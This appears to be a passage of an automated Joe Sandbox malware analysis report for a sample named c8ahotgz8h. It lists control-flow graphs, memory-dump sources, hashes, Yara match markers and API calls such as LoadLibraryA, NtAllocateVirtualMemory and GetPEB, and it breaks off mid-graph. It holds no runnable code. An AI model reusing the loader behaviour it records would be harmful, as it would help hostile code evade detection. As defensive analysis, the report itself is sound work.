                                                                                                                          • Opcode Fuzzy Hash: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
                                                                                                                          • Instruction Fuzzy Hash: 9A417A3520436A9FCB309E684CF03DB237A9F957B0F90032BCC699B682D735894D8652
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2072 232be04-232bea8 call 232c88b 2077 232f3ee-232f4b1 2072->2077 2078 232beae-232c025 call 232bede call 232ebec 2072->2078 2082 232f4b3-232f4e1 call 232fcc1 call 232f542 2077->2082 2083 232f4e4-232f53d LoadLibraryA call 232f542 2077->2083 2095 232e546-232e553 call 232c02c 2078->2095 2082->2083 2099 232e555 2095->2099 2100 232e51e-232e520 2095->2100 2099->2077 2103 232e518 2099->2103 2101 232e522 2100->2101 2102 232e4bf-232e4c0 2100->2102 2101->2095 2104 232e4a2 2102->2104 2105 232e4c2-232e4c4 2102->2105 2103->2095 2108 232e4a9-232e4ae 2104->2108 2106 232e463 2105->2106 2107 232e4c6 2105->2107 2106->2108 2109 232e4f0-232e509 call 232c7b8 2107->2109 2108->2109 2109->2103
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023204DF,16EF18E8,0232E3FE,00000000,0232042E), ref: 0232F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
                                                                                                                          • Instruction ID: 5568af9f5d1b88a803ff720ee625d6d245843792a2f68291c87df0df6bbba138
                                                                                                                          • Opcode Fuzzy Hash: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
                                                                                                                          • Instruction Fuzzy Hash: F53167756043799BCF302F2458A03DA636EAF85BA0FA1051BDC469BA41D7718D888A52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2112 232c02c-232c114 call 232c0b3 call 232c88b call 232ebec 2121 232c11a-232c11b 2112->2121 2122 232f3ee-232f4b1 2112->2122 2121->2122 2124 232f4b3-232f4e1 call 232fcc1 call 232f542 2122->2124 2125 232f4e4-232f53d LoadLibraryA call 232f542 2122->2125 2124->2125
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023204DF,16EF18E8,0232E3FE,00000000,0232042E), ref: 0232F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
                                                                                                                          • Instruction ID: d2a707ced68c1cd97293cea2e525999db5a24afb1275bfa9084fb6dc7c9c2d32
                                                                                                                          • Opcode Fuzzy Hash: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
                                                                                                                          • Instruction Fuzzy Hash: 76318C726003289BCF30AE264D543DE27BBAFD4750FBA8417DC09DB600C771CD4A8A51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2133 232f3ee-232f4b1 2135 232f4b3-232f4e1 call 232fcc1 call 232f542 2133->2135 2136 232f4e4-232f53d LoadLibraryA call 232f542 2133->2136 2135->2136
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023204DF,16EF18E8,0232E3FE,00000000,0232042E), ref: 0232F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
                                                                                                                          • Instruction ID: a16d496182511e7ef7d2b13895ed3614b12ab76cd99eea5806f39665cefe5d94
                                                                                                                          • Opcode Fuzzy Hash: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
                                                                                                                          • Instruction Fuzzy Hash: DC1166716013399BCF30AF2A59A43CA237AAFD8790FA5801BDC49DB600C7718D498B91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2144 2323800-2323858 2147 2323a62-232c1ca TerminateProcess 2144->2147 2148 232385e-2323876 call 2325ee3 2144->2148
                                                                                                                          APIs
                                                                                                                          • TerminateProcess.KERNELBASE ref: 0232C1BE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ProcessTerminate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 560597551-0
                                                                                                                          • Opcode ID: fef95deefe1bdea80e374594cdcf887aad249fa194f619d99be148cb413548ad
                                                                                                                          • Instruction ID: 5e6b93bef45e803cbc102de45c63aeb1c1276c1e8cbf2317a215830dd3d74df8
                                                                                                                          • Opcode Fuzzy Hash: fef95deefe1bdea80e374594cdcf887aad249fa194f619d99be148cb413548ad
                                                                                                                          • Instruction Fuzzy Hash: 3101763559836ACBCB18AE3085823EDB7A0EF51360F96555CCCD257402D32540CECF03
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Executed Functions

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID: H+m$Sm!|$U=b$yW^g$yW^g$}#c
                                                                                                                          • API String ID: 1029625771-3546614695
                                                                                                                          • Opcode ID: a994831db66d78b2093441fe9113e5f143bbfa255ab206bf9932e702806651c5
                                                                                                                          • Instruction ID: d0a24021aa5a83e410dc14346b831975518b4d005ce0386654d94a0d83295bd7
                                                                                                                          • Opcode Fuzzy Hash: a994831db66d78b2093441fe9113e5f143bbfa255ab206bf9932e702806651c5
                                                                                                                          • Instruction Fuzzy Hash: 77B2357160434ADFDF349E38C9A57EA3BA2FF55390F95812EDC8A9B244D3348985CB42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 295 5706a2-5706df call 56fcc1 298 56a574-56a80f call 571490 call 56a760 295->298 299 5706e5-57073c 295->299 318 56a815-56a841 298->318 319 56f3ee-56f4b1 298->319 303 570742-57074e 299->303 304 573b58-573bea call 56f0f7 299->304 322 56a847-56a8fa 318->322 323 561320-5734e0 call 5610c0 call 560561 318->323 325 56f4e4-56f4e9 LoadLibraryA 319->325 326 56f4b3-56f4e1 call 56fcc1 call 56f542 319->326 330 56a900-56aa86 call 56f3ca call 572acd 322->330 331 57374d-573755 322->331 352 5734e6-57353b 323->352 353 5736ca-573733 323->353 332 56f533-56f53d call 56f542 325->332 326->325 354 56aa8b-56aac7 330->354 355 56aa86 call 572acd 330->355 334 573756-57378f 331->334 334->334 339 573791-5737e0 334->339 352->353 360 573541-573545 352->360 358 56bbfe-56bd48 call 572acd * 3 354->358 359 56aacd-56afd9 call 56f3ee call 572acd call 56bd4b call 56f313 call 572acd 354->359 355->354 358->319 359->358 401 56afdf-56b089 359->401 360->353 362 57354b-57354f 360->362 362->353 365 573555-573559 362->365 365->353 368 57355f-573563 365->368 368->353 371 573569-57356d 368->371 371->353 374 573573-573581 371->374 374->353 377 573587-5735e8 374->377 384 5735e9-5735fd 377->384 386 573672-573689 384->386 387 5735ff-573603 384->387 386->323 390 57368f-5736b2 386->390 387->353 388 573609-573615 387->388 388->323 392 57361b-573669 388->392 392->384 401->319 403 56b08f-56b1e5 call 572acd 401->403 403->323 408 56b1eb-56b20b 403->408 408->358 409 56b211-56b3f2 call 56b2fb 408->409 415 56138e-561464 call 5737e8 409->415 416 56b3f8-56b554 call 572acd 409->416 425 561466-561497 415->425 426 5614dd-561502 415->426 416->358 427 56b55a-56b597 416->427 425->298 429 561517-561518 426->429 430 561572-561578 426->430 427->358 428 56b59d-56b604 427->428 434 56b606-56b63b 428->434 435 56b641-56b64a 428->435 429->430 431 561579-561594 430->431 431->429 433 561596-5615a6 431->433 436 5615b6-5615b9 433->436 437 5615a9-5615b4 433->437 434->358 434->435 435->298 438 56b650-56b66e 435->438 436->431 439 5615bb-5715f9 call 56f3ee * 2 call 5737e8 GetPEB call 5723e2 436->439 437->436 438->358 440 56b674-56b68f 438->440 463 571df1-571e3a 439->463 464 5715ff-5716a1 439->464 440->298 441 56b695-56b8b7 call 56f944 440->441 441->358 452 56b8bd-56b9ea call 57374d 441->452 452->358 468 56b9f0-56baba call 572acd 452->468 464->415 469 5716a7-571838 464->469 468->358 475 56bac0-56bb82 call 572acd 468->475 478 57183c-57184d 469->478 475->358 485 56bb84-56bbde 475->485 480 571853-571863 478->480 481 571e40-571e54 478->481 480->478 484 571865-571892 480->484 483 571e58-571e6d 481->483 486 571e73-571eac 483->486 487 572172-572187 483->487 484->478 488 571894-5718aa 484->488 485->331 493 56bbe4-56bbfd call 572acd 485->493 486->483 490 571eae-571ec5 486->490 487->415 492 57218d-57218e 487->492 488->478 491 5718ac-571920 488->491 490->483 494 571ec7-571f29 490->494 499 571922-57199c 491->499 496 572192-5721a1 492->496 494->483 504 571f2f-571f46 494->504 500 5721a7-572219 496->500 501 5723b6-5723dd call 5723e2 496->501 510 5719a2-5719e7 499->510 511 571a39-571a4c 499->511 500->415 507 57221f-57222a 500->507 504->415 509 571f4c-571fb8 504->509 507->496 513 572230-572244 507->513 519 571fbd-571fd1 509->519 512 571a69-571a79 510->512 511->512 514 571a4e-571a68 511->514 517 571a7f-571a96 512->517 518 571c2d-571c44 512->518 513->496 516 57224a-57227e 513->516 514->512 516->496 522 572284-5722f0 516->522 517->518 523 571a9c-571b0e 517->523 524 571d64-571da8 518->524 525 571c4a-571cd0 518->525 520 5720a7-5720e0 519->520 521 571fd7-571ff1 519->521 520->519 531 5720e6-57216c call 5723e2 520->531 526 571ff3-57200a 521->526 527 57201c-572084 521->527 536 5722f5-57230e 522->536 537 571b0f-571b3f 523->537 524->499 528 571dae-571dec call 5723e2 524->528 525->524 539 571cd6-571d61 525->539 526->323 533 572010-57201a 526->533 527->520 528->463 533->527 541 572088-5720a6 533->541 542 572310-57237a 536->542 543 57237b-5723ae 536->543 537->537 544 571b41-571bdb 537->544 539->524 541->520 542->543 543->536 548 5723b4 543->548 544->537 551 571be1-571c20 544->551 548->501 551->537 552 571c26-571c2a 551->552 552->518
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ";Jm$H+m$U=b$}#c$EK]
                                                                                                                          • API String ID: 0-2571250244
                                                                                                                          • Opcode ID: f9d2e81ba44d5965e827736770de22e66262a531534cc237cc2832ee5ebeaf67
                                                                                                                          • Instruction ID: de7bc562adc1e8c29e232d2a8b7260b26451281c24de198095c5d92c0124658d
                                                                                                                          • Opcode Fuzzy Hash: f9d2e81ba44d5965e827736770de22e66262a531534cc237cc2832ee5ebeaf67
                                                                                                                          • Instruction Fuzzy Hash: 20A2447160434A9FDF349E38CDA57DA7BA2FF55350F59822EDC8A8B250D3358986CB02
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 553 56ce0c-56ceed call 56f3ee * 5 565 56cef3-56cfe3 553->565 567 57374d-573755 565->567 568 56cfe9-56d064 565->568 569 573756-57378f 567->569 572 56138e-561464 call 5737e8 568->572 573 56d06a-56d075 call 572acd 568->573 569->569 571 573791-5737e0 569->571 585 561466-561497 572->585 586 5614dd-561502 572->586 580 56d5fe-56d6a8 call 572acd * 2 573->580 581 56d07b-56d187 call 572acd 573->581 580->565 611 56f3ee-56f4b1 580->611 581->580 596 56d18d-56d1d1 581->596 589 56a574-56a80f call 571490 call 56a760 585->589 592 561517-561518 586->592 593 561572-561578 586->593 589->611 627 56a815-56a841 589->627 592->593 594 561579-561594 593->594 594->592 599 561596-5615a6 594->599 596->589 605 56d1d7-56d32d call 56d1f6 call 572acd 596->605 603 5615b6-5615b9 599->603 604 5615a9-5615b4 599->604 603->594 607 5615bb-5715f9 call 56f3ee * 2 call 5737e8 GetPEB call 5723e2 603->607 604->603 605->580 637 56d333-56d392 605->637 664 571df1-571e3a 607->664 665 5715ff-5716a1 607->665 618 56f4e4-56f53d LoadLibraryA call 56f542 611->618 619 56f4b3-56f4e1 call 56fcc1 call 56f542 611->619 619->618 632 56a847-56a8fa 627->632 633 561320-5734e0 call 5610c0 call 560561 627->633 632->567 645 56a900-56aa86 call 56f3ca call 572acd 632->645 671 5734e6-57353b 633->671 672 5736ca-573733 633->672 637->611 643 56d398-56d3f8 637->643 647 56d3fb-56d480 643->647 676 56aa8b-56aac7 645->676 677 56aa86 call 572acd 645->677 656 56d482-56d488 647->656 657 56d48a-56d54b call 572acd 647->657 656->657 657->580 680 56d551-56d55e 657->680 665->572 675 5716a7-571838 665->675 671->672 684 573541-573545 671->684 698 57183c-57184d 675->698 681 56bbfe-56bd48 call 572acd * 3 676->681 682 56aacd-56afd9 call 56f3ee call 572acd call 56bd4b call 56f313 call 572acd 676->682 677->676 685 56d576-56d5f7 call 572acd * 2 680->685 686 56d560-56d56f 680->686 681->611 682->681 795 56afdf-56b089 682->795 684->672 689 57354b-57354f 684->689 686->647 689->672 694 573555-573559 689->694 694->672 699 57355f-573563 694->699 703 571853-571863 698->703 704 571e40-571e54 698->704 699->672 705 573569-57356d 699->705 703->698 711 571865-571892 703->711 709 571e58-571e6d 704->709 705->672 712 573573-573581 705->712 714 571e73-571eac 709->714 715 572172-572187 709->715 711->698 717 571894-5718aa 711->717 712->672 718 573587-5735e8 712->718 714->709 721 571eae-571ec5 714->721 715->572 724 57218d-57218e 715->724 717->698 723 5718ac-571920 717->723 731 5735e9-5735fd 718->731 721->709 727 571ec7-571f29 721->727 734 571922-57199c 723->734 730 572192-5721a1 724->730 727->709 743 571f2f-571f46 727->743 735 5721a7-572219 730->735 736 5723b6-5723dd call 5723e2 730->736 737 573672-573689 731->737 738 5735ff-573603 731->738 752 5719a2-5719e7 734->752 753 571a39-571a4c 734->753 735->572 747 57221f-57222a 735->747 737->633 741 57368f-5736b2 737->741 738->672 739 573609-573615 738->739 739->633 748 57361b-573669 739->748 743->572 750 571f4c-571fb8 743->750 747->730 755 572230-572244 747->755 748->731 764 571fbd-571fd1 750->764 754 571a69-571a79 752->754 753->754 756 571a4e-571a68 753->756 762 571a7f-571a96 754->762 763 571c2d-571c44 754->763 755->730 761 57224a-57227e 755->761 756->754 761->730 768 572284-5722f0 761->768 762->763 769 571a9c-571b0e 762->769 770 571d64-571da8 763->770 771 571c4a-571cd0 763->771 765 5720a7-5720e0 764->765 766 571fd7-571ff1 764->766 765->764 778 5720e6-57216c call 5723e2 765->778 772 571ff3-57200a 766->772 773 57201c-572084 766->773 784 5722f5-57230e 768->784 785 571b0f-571b3f 769->785 770->734 775 571dae-571dec call 5723e2 770->775 771->770 787 571cd6-571d61 771->787 772->633 780 572010-57201a 772->780 773->765 775->664 780->773 789 572088-5720a6 780->789 791 572310-57237a 784->791 792 57237b-5723ae 784->792 785->785 793 571b41-571bdb 785->793 787->770 789->765 791->792 792->784 798 5723b4 792->798 793->785 803 571be1-571c20 793->803 795->611 802 56b08f-56b1e5 call 572acd 795->802 798->736 802->633 809 56b1eb-56b20b 802->809 803->785 805 571c26-571c2a 803->805 805->763 809->681 810 56b211-56b3f2 call 56b2fb 809->810 810->572 816 56b3f8-56b554 call 572acd 810->816 816->681 821 56b55a-56b597 816->821 821->681 822 56b59d-56b604 821->822 824 56b606-56b63b 822->824 825 56b641-56b64a 822->825 824->681 824->825 825->589 826 56b650-56b66e 825->826 826->681 827 56b674-56b68f 826->827 827->589 828 56b695-56b8b7 call 56f944 827->828 828->681 834 56b8bd-56b9ea call 57374d 828->834 834->681 840 56b9f0-56baba call 572acd 834->840 840->681 844 56bac0-56bb82 call 572acd 840->844 844->681 848 56bb84-56bbde 844->848 848->567 850 56bbe4-56bbfd call 572acd 848->850
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID: H+m$U=b$}#c$EK]
                                                                                                                          • API String ID: 1029625771-1197094480
                                                                                                                          • Opcode ID: 82915853cc823b39f77a4ebf5ea4c2710b2b522bee9262211b365f458a48c437
                                                                                                                          • Instruction ID: 2cbbea7bca7ffd11db10f875e6770a580d11d4af5b5b0b0b4772a5f387146c35
                                                                                                                          • Opcode Fuzzy Hash: 82915853cc823b39f77a4ebf5ea4c2710b2b522bee9262211b365f458a48c437
                                                                                                                          • Instruction Fuzzy Hash: 60C2357160434A9FDF349E34CDA57EE3BA2FF55390F95852ADC8A9B254D3308986CB02
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: );J$EK]
                                                                                                                          • API String ID: 0-1158390361
                                                                                                                          • Opcode ID: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
                                                                                                                          • Instruction ID: 3f7655a3a4547983acea0519667cdc86175e01c8c82dee460008b03e70238bcf
                                                                                                                          • Opcode Fuzzy Hash: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
                                                                                                                          • Instruction Fuzzy Hash: DAB17C30A04349CFDF389E34D9A47EA3BA2FF55350F59851ACC8E8B655D7318A82EB01
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1137 56c88b-56c8a0 1138 56c8a6-56c954 1137->1138 1139 56cbe8-56cd65 call 56f32f call 56cc7e 1137->1139 1143 56f3ee-56f4b1 1138->1143 1144 56c95a-56ca12 call 56f3ee 1138->1144 1139->1143 1148 56f4e4-56f4e9 LoadLibraryA 1143->1148 1149 56f4b3-56f4e1 call 56fcc1 call 56f542 1143->1149 1159 56a574-56a80f call 571490 call 56a760 1144->1159 1160 56ca18-56cae3 call 56ca93 1144->1160 1153 56f533-56f53d call 56f542 1148->1153 1149->1148 1159->1143 1179 56a815-56a841 1159->1179 1160->1159 1173 56cae9-56cb18 1160->1173 1173->1159 1175 56cb1e-56cbe6 NtAllocateVirtualMemory 1173->1175 1175->1139 1180 56a847-56a8fa 1179->1180 1181 561320-5734e0 call 5610c0 call 560561 1179->1181 1185 56a900-56aa86 call 56f3ca call 572acd 1180->1185 1186 57374d-573755 1180->1186 1201 5734e6-57353b 1181->1201 1202 5736ca-573733 1181->1202 1203 56aa8b-56aac7 1185->1203 1204 56aa86 call 572acd 1185->1204 1188 573756-57378f 1186->1188 1188->1188 1191 573791-5737e0 1188->1191 1201->1202 1209 573541-573545 1201->1209 1207 56bbfe-56bd48 call 572acd * 3 1203->1207 1208 56aacd-56afd9 call 56f3ee call 572acd call 56bd4b call 56f313 call 572acd 1203->1208 1204->1203 1207->1143 1208->1207 1250 56afdf-56b089 1208->1250 1209->1202 1211 57354b-57354f 1209->1211 1211->1202 1214 573555-573559 1211->1214 1214->1202 1217 57355f-573563 1214->1217 1217->1202 1220 573569-57356d 1217->1220 1220->1202 1223 573573-573581 1220->1223 1223->1202 1226 573587-5735e8 1223->1226 1233 5735e9-5735fd 1226->1233 1235 573672-573689 1233->1235 1236 5735ff-573603 1233->1236 1235->1181 1239 57368f-5736b2 1235->1239 1236->1202 1237 573609-573615 1236->1237 1237->1181 1241 57361b-573669 1237->1241 1241->1233 1250->1143 1252 56b08f-56b1e5 call 572acd 1250->1252 1252->1181 1257 56b1eb-56b20b 1252->1257 1257->1207 1258 56b211-56b3f2 call 56b2fb 1257->1258 1264 56138e-561464 call 5737e8 1258->1264 1265 56b3f8-56b554 call 572acd 1258->1265 1274 561466-561497 1264->1274 1275 5614dd-561502 1264->1275 1265->1207 1276 56b55a-56b597 1265->1276 1274->1159 1278 561517-561518 1275->1278 1279 561572-561578 1275->1279 1276->1207 1277 56b59d-56b604 1276->1277 1283 56b606-56b63b 1277->1283 1284 56b641-56b64a 1277->1284 1278->1279 1280 561579-561594 1279->1280 1280->1278 1282 561596-5615a6 1280->1282 1285 5615b6-5615b9 1282->1285 1286 5615a9-5615b4 1282->1286 1283->1207 1283->1284 1284->1159 1287 56b650-56b66e 1284->1287 1285->1280 1288 5615bb-5715f9 call 56f3ee * 2 call 5737e8 GetPEB call 5723e2 1285->1288 1286->1285 1287->1207 1289 56b674-56b68f 1287->1289 1312 571df1-571e3a 1288->1312 1313 5715ff-5716a1 1288->1313 1289->1159 1290 56b695-56b8b7 call 56f944 1289->1290 1290->1207 1301 56b8bd-56b9ea call 57374d 1290->1301 1301->1207 1317 56b9f0-56baba call 572acd 1301->1317 1313->1264 1318 5716a7-571838 1313->1318 1317->1207 1324 56bac0-56bb82 call 572acd 1317->1324 1327 57183c-57184d 1318->1327 1324->1207 1334 56bb84-56bbde 1324->1334 1329 571853-571863 1327->1329 1330 571e40-571e54 1327->1330 1329->1327 1333 571865-571892 1329->1333 1332 571e58-571e6d 1330->1332 1335 571e73-571eac 1332->1335 1336 572172-572187 1332->1336 1333->1327 1337 571894-5718aa 1333->1337 1334->1186 1342 56bbe4-56bbfd call 572acd 1334->1342 1335->1332 1339 571eae-571ec5 1335->1339 1336->1264 1341 57218d-57218e 1336->1341 1337->1327 1340 5718ac-571920 1337->1340 1339->1332 1343 571ec7-571f29 1339->1343 1348 571922-57199c 1340->1348 1345 572192-5721a1 1341->1345 1343->1332 1353 571f2f-571f46 1343->1353 1349 5721a7-572219 1345->1349 1350 5723b6-5723dd call 5723e2 1345->1350 1359 5719a2-5719e7 1348->1359 1360 571a39-571a4c 1348->1360 1349->1264 1356 57221f-57222a 1349->1356 1353->1264 1358 571f4c-571fb8 1353->1358 1356->1345 1362 572230-572244 1356->1362 1368 571fbd-571fd1 1358->1368 1361 571a69-571a79 1359->1361 1360->1361 1363 571a4e-571a68 1360->1363 1366 571a7f-571a96 1361->1366 1367 571c2d-571c44 1361->1367 1362->1345 1365 57224a-57227e 1362->1365 1363->1361 1365->1345 1371 572284-5722f0 1365->1371 1366->1367 1372 571a9c-571b0e 1366->1372 1373 571d64-571da8 1367->1373 1374 571c4a-571cd0 1367->1374 1369 5720a7-5720e0 1368->1369 1370 571fd7-571ff1 1368->1370 1369->1368 1380 5720e6-57216c call 5723e2 1369->1380 1375 571ff3-57200a 1370->1375 1376 57201c-572084 1370->1376 1385 5722f5-57230e 1371->1385 1386 571b0f-571b3f 1372->1386 1373->1348 1377 571dae-571dec call 5723e2 1373->1377 1374->1373 1388 571cd6-571d61 1374->1388 1375->1181 1382 572010-57201a 1375->1382 1376->1369 1377->1312 1382->1376 1390 572088-5720a6 1382->1390 1391 572310-57237a 1385->1391 1392 57237b-5723ae 1385->1392 1386->1386 1393 571b41-571bdb 1386->1393 1388->1373 1390->1369 1391->1392 1392->1385 1397 5723b4 1392->1397 1393->1386 1400 571be1-571c20 1393->1400 1397->1350 1400->1386 1401 571c26-571c2a 1400->1401 1401->1367
                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(8D05082D,?,-00000001EF38FF1E), ref: 0056CBC8
                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,4A82DAC6,005604DF,16EF18E8,0056E3FE,00000000,0056042E), ref: 0056F4E6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_28_2_560000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                                                          • String ID: U=b
                                                                                                                          • API String ID: 2616484454-117013522
                                                                                                                          • Opcode ID: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
                                                                                                                          • Instruction ID: 3ef18e08b5a3f845fcd61d351520893dd6cedf6b16431fadf5f561777080bf1f
                                                                                                                          • Opcode Fuzzy Hash: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
                                                                                                                          • Instruction Fuzzy Hash: 45814B71A0035BDFDF349E689DA43EA3AB2BF95390F94413ADC899B254D7318E81CB11
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1402 571161-57117b 1403 571181-5711be 1402->1403 1403->1403 1404 5711c0-571213 1403->1404 1406 56138e-561464 call 5737e8 1404->1406 1407 571219-571275 1404->1407 1416 561466-561497 1406->1416 1417 5614dd-561502 1406->1417 1407->1406 1412 57127b-5712ad 1407->1412 1414 5712b3-571343 1412->1414 1415 56f3ee-56f4b1 1412->1415 1436 57374d-573755 1414->1436 1421 56f4e4-56f53d LoadLibraryA call 56f542 1415->1421 1422 56f4b3-56f4e1 call 56fcc1 call 56f542 1415->1422 1420 56a574-56a80f call 571490 call 56a760 1416->1420 1423 561517-561518 1417->1423 1424 561572-561578 1417->1424 1420->1415 1455 56a815-56a841 1420->1455 1422->1421 1423->1424 1426 561579-561594 1424->1426 1426->1423 1433 561596-5615a6 1426->1433 1438 5615b6-5615b9 1433->1438 1439 5615a9-5615b4 1433->1439 1444 573756-57378f 1436->1444 1438->1426 1443 5615bb-5715f9 call 56f3ee * 2 call 5737e8 GetPEB call 5723e2 1438->1443 1439->1438 1478 571df1-571e3a 1443->1478 1479 5715ff-5716a1 1443->1479 1444->1444 1447 573791-5737e0 1444->1447 1457 56a847-56a8fa 1455->1457 1458 561320-5734e0 call 5610c0 call 560561 1455->1458 1457->1436 1464 56a900-56aa86 call 56f3ca call 572acd 1457->1464 1484 5734e6-57353b 1458->1484 1485 5736ca-573733 1458->1485 1488 56aa8b-56aac7 1464->1488 1489 56aa86 call 572acd 1464->1489 1479->1406 1487 5716a7-571838 1479->1487 1484->1485 1495 573541-573545 1484->1495 1505 57183c-57184d 1487->1505 1492 56bbfe-56bd48 call 572acd * 3 1488->1492 1493 56aacd-56afd9 call 56f3ee call 572acd call 56bd4b call 56f313 call 572acd 1488->1493 1489->1488 1492->1415 1493->1492 1599 56afdf-56b089 1493->1599 1495->1485 1498 57354b-57354f 1495->1498 1498->1485 1502 573555-573559 1498->1502 1502->1485 1506 57355f-573563 1502->1506 1509 571853-571863 1505->1509 